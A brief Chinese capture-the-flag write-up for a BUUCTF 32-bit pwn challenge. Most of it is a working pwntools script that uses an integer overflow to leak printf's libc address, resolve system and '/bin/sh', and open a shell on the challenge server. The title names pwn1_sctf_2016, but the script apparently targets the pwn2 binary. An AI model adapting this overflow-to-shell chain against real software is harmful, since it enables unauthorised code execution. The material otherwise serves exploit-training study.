Buuctf pwn1_sctf_2016-爱代码爱编程
checksec
run
ida
在程序中搜索既没有system又没有bin/sh,所以明显的rop
nptr处可以使用整数溢出构造rop
然后可以利用printf函数来泄露程序的libc版本
覆盖返回地址执行system来getshell
exp
from pwn import *
from LibcSearcher import *
context(os = 'linux', arch = 'i386', log_level = 'debug')
elf = ELF("./pwn2")
local = 0
if local:
r = process("./pwn2")
else:
r = remote("node4.buuoj.cn",25331)
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
r.recvuntil("How many bytes do you want me to read?")
r.sendline("-1")
leak_payload = b'a'*(0x2C+0x4)+p32(printf_plt)+p32(main_addr)+p32(printf_got)
r.recvuntil("data!\n")
r.sendline(leak_payload)
r.recvuntil("\n")
printf_addr = u32(r.recv(4))
log.success("the printf_addr is " + hex(printf_addr))
libc = LibcSearcher('printf',printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
str_bin_sh_addr= libc_base + libc.dump('str_bin_sh')
r.recvuntil("How many bytes do you want me to read?")
r.sendline("-1")
r.recvuntil("data!\n")
payload = b'a'*(0x2C+0x4)+p32(system_addr)+p32(main_addr)+p32(str_bin_sh_addr)
r.sendline(payload)
r.interactive()